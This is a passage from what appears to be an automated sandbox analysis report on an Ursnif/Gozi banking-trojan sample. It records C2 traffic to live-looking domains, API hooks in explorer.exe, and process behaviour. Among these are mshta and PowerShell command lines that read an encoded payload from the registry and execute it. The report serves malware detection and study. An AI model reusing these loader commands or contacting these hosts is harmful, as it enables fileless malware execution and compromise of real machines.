7b 53 23 e6 00 13 6a e3 e9 85 33 bc 2a a1 5f 8a a6 d5 1e b4 31 cb b1 98 2b ca 91 6e 9c 81 c1 22 fd f3 37 62 ef 26 2a 77 93 bb bb 60 0e f9 ee 61 99 3c d4 9b 14 5c 42 58 45 63 55 d2 35 2d 8c d9 33 01 6f d8 a0 28 b7 24 09 2a 13 b2 4c aa 48 b3 ef 23 f8 51 64 a5 cb ce 90 8c 7e 9d 76 3a ff a5 86 97 d3 7e 73 64 4a 0e b8 3a 12 db 3f b7 9f 6e ed c8 9f 42 d6 e7 0a c3 2f 1e d3 fd 8e 9b f1 6c 72 43 e6 50 9d 97 be 51 9c d0 03 9c 20 1d 6c 71 f7 ac 03 ee 77 97 1f bb d5 92 38 19 b9 bf 1b b6 f7 b9 f6 e4 88 b8 c5 c2 3d 1e 46 fd d8 de 78 52 f6 8d 96 47 de 4b 38 5f c7 40 07 55 f7 04 a4 1d 28 9b 9e 78 1f 81 75 1b 89 06 7f bd d9 32 86 6c 8f e8 b4 dc 4f 57 30 11 09 00 6c 50 f9 9f db 73 67 2a c1 4b 0a 84 82 cc 23 bb 3f 80 54 ef 16 0a 78 6a 7a 7f 7a 43 a5 2a 69 39 98 c0 fb 4a 9a c6 4b 9a df 62 cb ca 29 a3 06 52 6f 2b f4 46 68 91 f6 7e 66 ce ca 87 17 07 d5 af 68 bb 42 2c 4a 68 a0 d4 cc 95 03 34 9e d8 af 53 df 4c d9 f5 fa c5 22 f0 cc df 42 8a 5d d6 c1 d2 f2 ad 8d 82 01 f6 00 a4 e5 71 df 52 03 6b a0 c0 a7 3f 36 0b 2e f6 ad 64 7a af ff a6 90 92 9e 5d 8c 57 03 4a 75 92 a8 92 15 18 87 23 f8 80 d5 86 b7 a0 19 fb f7 ec ac 54 3e 3c a8 b0 94 19 42 69 d0 f5 79 55 2a fb f6 40 ce 4d a0 22 02 a5 94 64 12 1d b5 da 10 c3 5d d7 45 1c 2d df 5c 84 1e 31 d0 7e 94 b2 ec f8 5e cf 18 bb d4 72 e3 13 fb 24 29 9f e2 6b 46 d2 60 54 cf d8 f0 42 41 a5 19 76 93 0d d8 34 07 bd af 2a c4 15 95 15 40 10 1d 07 d6 f7 f3 65 01 f2 7b 4f ac 22 d9 c1 12 9d 73 2d a9 41 23 cd 75 25 2b e0 fd e5 a3 38 36 a9 85 4d f0
                                                                                                                                    Data Ascii: 762C?(EWsB]sqKRo&{Pz`8:.iyv,6)-=5,}6~cZh8MX<sCJ?#viW@pN`B$I!pfi`+(;dSZ:l7_9@)D1fD2S 8gP)}nvK>jy{leRyfg\h2'?!JNhC2GiToAq:Eaxhs?,QjPGk&QD@h T4egXcKi3L:8d=t/Z&.:,"SV?N`WlOQjs$chk`6KeWkSYG2l{S#j3*_1+n"7b&*w`a<\BXEcU5-3o($*LH#Qd~v:~sdJ:?nB/lrCPQ lqw8=FxRGK8_@U(xu2lOW0lPsg*K#?TxjzzC*i9JKb)Ro+Fh~fhB,Jh4SL"B]qRk?6.dz]WJu#T><BiyU*@M"d]E-\1~^r$)kF`TBAv4*@e{O"s-A#u%+86M


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    5192.168.2.64975445.138.24.680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:11:15.777790070 CET5096OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Host: c56.lepini.at
                                                                                                                                    Jan 22, 2021 19:11:16.118916988 CET5105INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Fri, 22 Jan 2021 18:11:15 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 138820
                                                                                                                                    Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                    Connection: close
                                                                                                                                    ETag: "5db6b84e-21e44"
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                    Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    6192.168.2.64975745.138.24.680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:11:23.532231092 CET5291OUTGET /api1/xnHAsL1d/fsXvh_2FqVkJzjJvIXVP386/sdHFYJjUzJ/mq43UZwYK4FgDCOnc/d6cqEgrS6hS0/yp4nDUlwnDa/ddfbdz56Dh1hTq/LrfxBoj9_2FbR1C4Ne_2F/szE2P1qBc4BfGVsX/nGM5l8QMlmw5kmi/QVG_2BIrV4GqfgGs53/ZvRn1P0u9/8VUaGimT1Vpnn1Eb2u3U/bOn04R5ChWboXWbTtj8/m4lBRSaAxwnyjeEKdpyj8r/iXLsJGMs8uSTY/pDl9P04P/3WN74fdSL4m2h4Em0_2BNdG/z7s8dMlVkI/qqzG94ApmaqBEZGQ7/8vA HTTP/1.1
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Pragma: no-cache
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
                                                                                                                                    Host: api3.lepini.at
                                                                                                                                    Jan 22, 2021 19:11:26.717514038 CET5291INHTTP/1.0 503 Service Unavailable
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    7192.168.2.649758128.14.142.22080C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:11:27.256846905 CET5292OUTPOST /api1/PwElXtu1a1ZKEBW8VI4ILA6/C13ZlCGLPf/xbMloqVHEi2N8EvPw/onOYysTw787u/lNsSQdb7adO/WTcHzLbVAjUFsU/yNI28gR4HNSgUrzaABrB_/2Ff5rClIFDKCPamX/LhKcGHTdcpy3Q1x/C_2FUBl8MXyD7rFF5y/_2BqpwBxk/tzgRETfStG7sL50DxVPi/KudBEmh7ELXBUurmd1W/HnwD8_2F7x9j58GCY_2BCE/FHx8MfU3Gbyrl/GAR0LJZU/2CBuYYB3OJmIjTAisk7a2gA/8gGq_2B5fD/hW5rhKLd6LFogxF1_/2BMayi7nxB4/VTo4 HTTP/1.1
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Pragma: no-cache
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
                                                                                                                                    Content-Length: 2
                                                                                                                                    Host: app.crasa.at
                                                                                                                                    Jan 22, 2021 19:11:27.442143917 CET5293INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Fri, 22 Jan 2021 18:11:27 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 146
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                    Code Manipulations

                                                                                                                                    User Modules

                                                                                                                                    Hook Summary

                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                                                                                                    CreateProcessAsUserWEATexplorer.exe
                                                                                                                                    CreateProcessAsUserWINLINEexplorer.exe
                                                                                                                                    CreateProcessWEATexplorer.exe
                                                                                                                                    CreateProcessWINLINEexplorer.exe
                                                                                                                                    CreateProcessAEATexplorer.exe
                                                                                                                                    CreateProcessAINLINEexplorer.exe

                                                                                                                                    Processes

                                                                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFD88935200
                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4DEC590
                                                                                                                                    Process: explorer.exe, Module: WININET.dll
                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFD88935200
                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4DEC590
                                                                                                                                    Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                    CreateProcessAsUserWEAT7FFD8893521C
                                                                                                                                    CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                    CreateProcessWEAT7FFD88935200
                                                                                                                                    CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                    CreateProcessAEAT7FFD8893520E
                                                                                                                                    CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00

                                                                                                                                    Statistics

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Start time:19:09:24
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:loaddll32.exe 'C:\Users\user\Desktop\out.dll'
                                                                                                                                    Imagebase:0xfc0000
                                                                                                                                    File size:120832 bytes
                                                                                                                                    MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                    Reputation:moderate

                                                                                                                                    General

                                                                                                                                    Start time:19:10:19
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                    Imagebase:0x7ff721e20000
                                                                                                                                    File size:823560 bytes
                                                                                                                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:19:10:19
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2
                                                                                                                                    Imagebase:0x820000
                                                                                                                                    File size:822536 bytes
                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:19:10:27
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2
                                                                                                                                    Imagebase:0x820000
                                                                                                                                    File size:822536 bytes
                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:19:10:35
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2
                                                                                                                                    Imagebase:0x820000
                                                                                                                                    File size:822536 bytes
                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:19:10:41
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                    Imagebase:0x7ff77ea90000
                                                                                                                                    File size:14848 bytes
                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate

                                                                                                                                    General

                                                                                                                                    Start time:19:10:42
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                    Imagebase:0x7ff743d60000
                                                                                                                                    File size:447488 bytes
                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:19:10:43
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:19:10:49
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
                                                                                                                                    Imagebase:0x7ff6dd3f0000
                                                                                                                                    File size:2739304 bytes
                                                                                                                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:moderate

                                                                                                                                    General

                                                                                                                                    Start time:19:10:50
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
                                                                                                                                    Imagebase:0x7ff7cc0c0000
                                                                                                                                    File size:47280 bytes
                                                                                                                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate

                                                                                                                                    General

                                                                                                                                    Start time:19:10:54
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
                                                                                                                                    Imagebase:0x7ff6dd3f0000
                                                                                                                                    File size:2739304 bytes
                                                                                                                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:moderate

                                                                                                                                    General

                                                                                                                                    Start time:19:10:54
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
                                                                                                                                    Imagebase:0x7ff7cc0c0000
                                                                                                                                    File size:47280 bytes
                                                                                                                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate

                                                                                                                                    General

                                                                                                                                    Start time:19:10:59
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:
                                                                                                                                    Imagebase:0x7ff6f22f0000
                                                                                                                                    File size:3933184 bytes
                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                                                                    General

                                                                                                                                    Start time:19:11:02
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\control.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                    Imagebase:0x7ff7c8c20000
                                                                                                                                    File size:117760 bytes
